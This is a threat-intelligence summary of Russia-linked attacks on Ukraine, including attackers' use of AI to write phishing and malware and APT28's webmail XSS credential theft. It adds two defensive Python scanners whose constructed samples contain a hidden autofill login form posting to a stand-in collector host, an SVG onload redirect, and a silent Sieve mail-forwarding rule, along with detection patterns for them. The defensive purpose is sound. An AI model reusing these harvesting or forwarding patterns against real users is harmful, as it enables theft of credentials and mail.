Full Report
Russian hackers' adoption of artificial intelligence (AI) in cyber attacks against Ukraine has reached a new level in the first half of 2025 (H1 2025), the country's State Service for Special Communications and Information Protection (SSSCIP) said. "Hackers now employ it not only to generate phishing messages, but some of the malware samples we have analyzed show clear signs of being generated
Analysis Summary
# Threat Actor: Various Russia-Linked Threat Groups (UAC-0219, UAC-0218, UAC-0226, UAC-0227, UAC-0125, APT28/UAC-0001, Sandworm/UAC-0002)
## Attribution & Identity
The actors discussed are generally linked to Russia and are actively conducting cyber operations against Ukraine. The analysis focuses on several distinct but co-occurring groups: UAC-0219, UAC-0218, UAC-0226, UAC-0227, UAC-0125 (a sub-cluster tied to Sandworm), APT28 (UAC-0001), and Sandworm (UAC-0002). A significant finding is the growing application of Artificial Intelligence (AI) across these groups, both to write phishing lures and, in some of the analysed samples, to generate the malware itself.
## Activity Summary
Threat actors are intensifying cyber attacks against Ukraine, utilizing AI for generating phishing content and developing malware. In H1 2025, 3,018 cyber incidents were recorded, showing an increase from H2 2024. Attacks against local authorities and military entities increased, while government and energy sector attacks saw a decline. Operations are synchronized with kinetic battlefield activity (hybrid warfare).
Specific campaign highlights:
* **UAC-0219:** Deployed **WRECKSTEEL**, a PowerShell data stealer whose code shows signs of having been AI-generated, against state administration bodies and critical infrastructure.
* **UAC-0218:** Conducted phishing campaigns targeting defense forces using **HOMESTEEL** delivered via booby-trapped RAR archives.
* **UAC-0226:** Targeted defense industrial sector innovators, local government, military units, and law enforcement with **GIFTEDCROOK** stealer.
* **UAC-0227:** Targeted local authorities, critical infrastructure, and Territorial Recruitment and Social Support Centers (TRCs/SSCs) using ClickFix-style tactics or SVG attachments to deliver **Amatera Stealer** and **Strela Stealer**.
* **UAC-0125 (Sandworm Sub-cluster):** Sent emails masquerading as ESET updates to deliver the C#-based backdoor **Kalambur (SUMBUR)**.
* **APT28 (UAC-0001):** Weaponized XSS vulnerabilities in Roundcube and Zimbra webmail software for zero-click attacks.
* **Sandworm (UAC-0002):** Targeted energy, defense, ISP, and research sectors.
## Tactics, Techniques & Procedures
- **AI Integration:** Use of Artificial Intelligence to generate sophisticated phishing messages and potentially generate malware samples.
- **Malware Delivery:** Use of booby-trapped RAR archives and SVG file attachments in phishing to distribute stealers.
- **Zero-Click Exploitation:** APT28 leveraged Cross-Site Scripting (XSS) vulnerabilities in webmail servers (Roundcube/Zimbra); because the injected script runs when the webmail client renders the message, the victim only has to open (or, with some flaws, merely preview) the email. The report excerpt does not name CVE identifiers; the Roundcube and Zimbra flaws publicly associated with this activity are:
  - CVE-2023-43770 (Roundcube stored XSS, likely referenced)
  - CVE-2024-37383 (Roundcube stored XSS via SVG attributes, likely referenced)
  - CVE-2025-49113 (Roundcube post-authentication PHP object deserialization leading to remote code execution; not an XSS, so not a zero-click vector by itself, likely referenced)
  - CVE-2024-27443 (Zimbra stored XSS in Classic UI calendar invite handling, likely referenced)
  - CVE-2025-27915 (Zimbra stored XSS via ICS calendar attachments in the Classic Web Client, likely referenced)
- **Credential Exfiltration via Webmail Exploits:** For APT28, the injected script ran inside the victim's authenticated webmail session and:
  - called the webmail's own API to read credentials and contact lists and to create mail-forwarding rules that send copies of incoming mail to attacker-controlled addresses;
  - inserted a concealed login form (a hidden HTML block with `autocomplete='on'`) so that the browser's password manager autofilled the saved username and password, which the script then read and exfiltrated.
- **Abuse of Legitimate Cloud Services:** Several groups used services like Dropbox and Google Drive for command and control or data staging.
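Two of the techniques above leave inspectable traces in the message itself: the SVG lures under Malware Delivery carry script or event handlers, and the credential-harvesting payload is a password field inside a hidden container. The following is an added example for this summary, not code from the SSSCIP report or from any mail product: a standard-library Python scanner that walks a MIME message and flags both shapes. The message, domain names and file name are constructed.

```python
"""Gateway-side checks for active SVG attachments and concealed login forms.

Added example, not from the SSSCIP report or any mail product. Parses a MIME
message with the Python standard library and flags (a) SVG parts that carry
active content and (b) HTML bodies containing a password field inside a hidden
container, the shape used to harvest browser-autofilled credentials.
"""
import re
import xml.etree.ElementTree as ET  # use defusedxml in production (entity expansion)
from email import message_from_string, policy
from html.parser import HTMLParser

# Elements with no closing tag; they must not affect the hidden-container stack.
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
             "link", "meta", "param", "source", "track", "wbr"}


def svg_findings(svg_bytes: bytes) -> list[str]:
    """Return reasons an SVG looks weaponised; an empty list means nothing found."""
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"unparseable SVG ({exc})"]
    findings = []
    for elem in root.iter():
        tag = elem.tag.split("}")[-1].lower()            # strip the XML namespace
        if tag in ("script", "foreignobject"):
            findings.append(f"<{tag}> element")
        for name, value in elem.attrib.items():
            local = name.split("}")[-1].lower()           # xlink:href -> href
            if local.startswith("on"):
                findings.append(f"event handler {local} on <{tag}>")
            elif local == "href" and re.match(r"\s*(javascript|data):", value, re.I):
                scheme = value.strip().split(":", 1)[0].lower()
                findings.append(f"{scheme}: URI in href on <{tag}>")
    return findings


class HiddenFormScanner(HTMLParser):
    """Flag <input type=password> whose element or ancestor is hidden.

    Hidden means the `hidden` attribute or an inline style of display:none,
    visibility:hidden or opacity:0. The autocomplete value is recorded because
    autofill is what turns a hidden field into a credential leak.
    """
    HIDDEN_STYLE = re.compile(
        r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])", re.I)

    def __init__(self):
        super().__init__()
        self._hidden_stack = []   # one bool per currently open non-void element
        self.findings = []

    def _is_hidden(self, attrs: dict) -> bool:
        return "hidden" in attrs or bool(self.HIDDEN_STYLE.search(attrs.get("style") or ""))

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        hidden_here = self._is_hidden(attrs)
        if tag == "input" and (attrs.get("type") or "").lower() == "password":
            if hidden_here or any(self._hidden_stack):
                self.findings.append(
                    f"concealed password input name={attrs.get('name')!r} "
                    f"autocomplete={attrs.get('autocomplete')!r}")
        if tag not in VOID_TAGS:
            self._hidden_stack.append(hidden_here)

    def handle_endtag(self, tag):
        if tag not in VOID_TAGS and self._hidden_stack:
            self._hidden_stack.pop()


def scan_message(raw: str) -> dict[str, list[str]]:
    """Walk every MIME part; return {part label: findings} for parts that matched."""
    msg = message_from_string(raw, policy=policy.default)
    report = {}
    for part in msg.walk():
        ctype = part.get_content_type()
        filename = part.get_filename() or ""
        if ctype == "image/svg+xml" or filename.lower().endswith(".svg"):
            hits = svg_findings(part.get_payload(decode=True) or b"")
            if hits:
                report[filename or "inline-svg"] = hits
        elif ctype == "text/html":
            scanner = HiddenFormScanner()
            scanner.feed(part.get_content())
            scanner.close()
            if scanner.findings:
                report["html-body"] = scanner.findings
    return report


# Constructed sample: an HTML body with a concealed login form plus an SVG
# attachment carrying an onload handler and a script element.
SAMPLE_MESSAGE = """\
From: it-support@example.invalid
To: user@example.invalid
Subject: Scanned document
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Please review the attached document.</p>
<div style="position:absolute; opacity:0; height:0">
  <form action="https://collector.example.invalid/s" method="post">
    <input name="user" autocomplete="on">
    <input type="password" name="pass" autocomplete="on">
  </form>
</div>
</body></html>
--b1
Content-Type: image/svg+xml; name="document.svg"
Content-Disposition: attachment; filename="document.svg"

<svg xmlns="http://www.w3.org/2000/svg" onload="location='https://lure.example.invalid/'">
  <rect width="100" height="100"/>
  <script>/* constructed placeholder */</script>
</svg>
--b1--
"""

if __name__ == "__main__":
    for label, hits in scan_message(SAMPLE_MESSAGE).items():
        print(label)
        for hit in hits:
            print("  -", hit)
```

The SVG check treats the file as XML rather than as an image, which is the point: any `<script>`, `on*` handler or `javascript:` href in an "image" is reason enough to quarantine. The HTML check only reports password fields that are concealed, so an ordinary visible login form in a newsletter does not fire.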
## Targeting
- **Sectors:** Defense forces, state administration bodies, critical infrastructure facilities, defense industrial sector organizations, local government bodies, military units, law enforcement agencies, Territorial Recruitment and Social Support Centers (TRCs/SSCs), energy sector, Internet Service Providers (ISPs), and research sectors.
- **Geography:** Primarily Ukraine.
- **Victims:** Specific organizations are not named, but categories include local and state authorities, and entities involved in defense and innovation.
## Tools & Infrastructure
- **Malware families used:**
- WRECKSTEEL (PowerShell data-stealing malware, possibly AI-developed)
- HOMESTEEL (delivered via phishing)
- GIFTEDCROOK (stealer)
- Amatera Stealer
- Strela Stealer
- Kalambur (SUMBUR) (C#-based backdoor)
- **Infrastructure:** Abuse of legitimate services such as Dropbox and Google Drive. The report excerpt does not list C2 IP addresses or domains for these campaigns; the only infrastructure it identifies is the Roundcube and Zimbra webmail platforms that were exploited.
## Implications
The integration of AI into Russian cyber operations signals a qualitative shift in threat capability, potentially leading to more scalable and effective attacks (e.g., highly personalized phishing or novel malware variants). The synchronized use of cyber attacks with kinetic warfare emphasizes the persistent, multi-domain threat Russia poses to Ukrainian resilience. The exploitation of common webmail infrastructure indicates an ongoing strategy of targeting widely utilized enterprise software.
## Mitigations
- Favour behavioural and content-based detections over static signatures: AI-generated lures and malware variants are cheap to regenerate, so a signature written for one sample ages quickly.
- Strengthen email gateway filtering for the attachment types abused here: archives (RAR) that contain scripts or executables, and SVG files that carry `<script>` elements, event-handler attributes or `foreignObject` content. Treat SVG as active content, not as an image.
- Immediately patch or apply mitigations for the Roundcube and Zimbra vulnerabilities listed above (CVE-2023-43770, CVE-2024-37383, CVE-2025-49113, CVE-2024-27443, and CVE-2025-27915), and after patching review webmail accounts for forwarding rules, filter scripts and contact exports created during the exposure window, since the exploit's first actions were exactly those.
- Treat `autocomplete` settings as a weak control against the hidden-form harvesting technique: current browsers largely ignore `autocomplete='off'` on login fields, so the attacker's hidden form is still autofilled. Rely instead on patching the XSS, a restrictive Content Security Policy for the webmail UI, and phishing-resistant MFA so that a harvested password alone does not grant access.
- Monitor for suspicious activity related to the abuse of legitimate cloud storage services (Dropbox, Google Drive), for example egress to these services from hosts or service accounts with no business use for them.
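The forwarding-rule manipulation listed under Tactics is persistent: it survives a password reset and keeps delivering mail after the XSS is patched. Roundcube writes user filters as Sieve scripts through its managesieve plugin, so one concrete check is to audit every user's script for `redirect` actions to external domains. The following is an added example for this summary, not code from the SSSCIP report, Roundcube or Dovecot; it assumes the scripts have already been read from disk or fetched over ManageSieve, and the script text, user name and domains are constructed. Zimbra stores filters in its own format, so this covers the Roundcube/Dovecot case only.

```python
"""Audit Sieve filter scripts for mail redirection to external domains.

Added example, not from the SSSCIP report, Roundcube or Dovecot. Assumes the
per-user Sieve scripts written by Roundcube's managesieve plugin (Dovecot
Pigeonhole format) are available as text; the sample below is constructed.
"""
import re

# Assumption: the organisation's own mail domains; anything else is external.
INTERNAL_DOMAINS = {"example.invalid"}

# Sieve `redirect` is the action that sends mail off the server. The `:copy`
# tag (RFC 3894) forwards a copy while still delivering the original, which is
# the quiet variant an attacker prefers because the mailbox looks normal.
REDIRECT_RE = re.compile(r'\bredirect\b(?P<tags>(?:\s*:\w+)*)\s*"(?P<addr>[^"]+)"', re.I)
# Both Sieve comment forms are stripped first so commented-out rules do not
# count. (A '#' inside a quoted string would also be stripped; acceptable for
# an audit that errs towards fewer false positives on inactive rules.)
COMMENT_RE = re.compile(r"#[^\n]*|/\*.*?\*/", re.S)


def external_redirects(script: str, internal: set[str] = INTERNAL_DOMAINS) -> list[dict]:
    """Return one record per active redirect whose target domain is not internal."""
    active = COMMENT_RE.sub("", script)
    hits = []
    for m in REDIRECT_RE.finditer(active):
        addr = m.group("addr").strip()
        domain = addr.rsplit("@", 1)[1].lower() if "@" in addr else ""
        if domain not in internal:
            hits.append({
                "address": addr,
                "domain": domain,
                "silent_copy": ":copy" in m.group("tags").lower(),
            })
    return hits


def audit(scripts: dict[str, str]) -> dict[str, list[dict]]:
    """Run the check over {username: script}; keep only users with findings."""
    return {user: hits for user, script in scripts.items()
            if (hits := external_redirects(script))}


# Constructed sample in the style of Roundcube's managesieve output: one benign
# rule, one always-true rule that silently copies all mail to an outside
# address, and one commented-out (inactive) redirect that must not be reported.
SAMPLE_SCRIPT = """\
require ["fileinto","copy"];
# rule:[Newsletters]
if header :contains "subject" "newsletter"
{
    fileinto "Lists";
}
# rule:[.]
if true
{
    redirect :copy "archive.mailbox@collector.example.test";
}
# rule:[old]
# redirect "me@other.example.test";
"""

if __name__ == "__main__":
    for user, hits in audit({"alice": SAMPLE_SCRIPT}).items():
        for h in hits:
            print(f"{user}: redirect to {h['address']} (silent copy: {h['silent_copy']})")
```

A rule named `.` with an always-true condition and a `:copy` redirect is the pattern to look for: the user keeps receiving mail, nothing is visibly missing, and the only evidence is the filter script itself. Any external redirect a user did not knowingly create should be treated as a compromise indicator and trigger a session and credential reset.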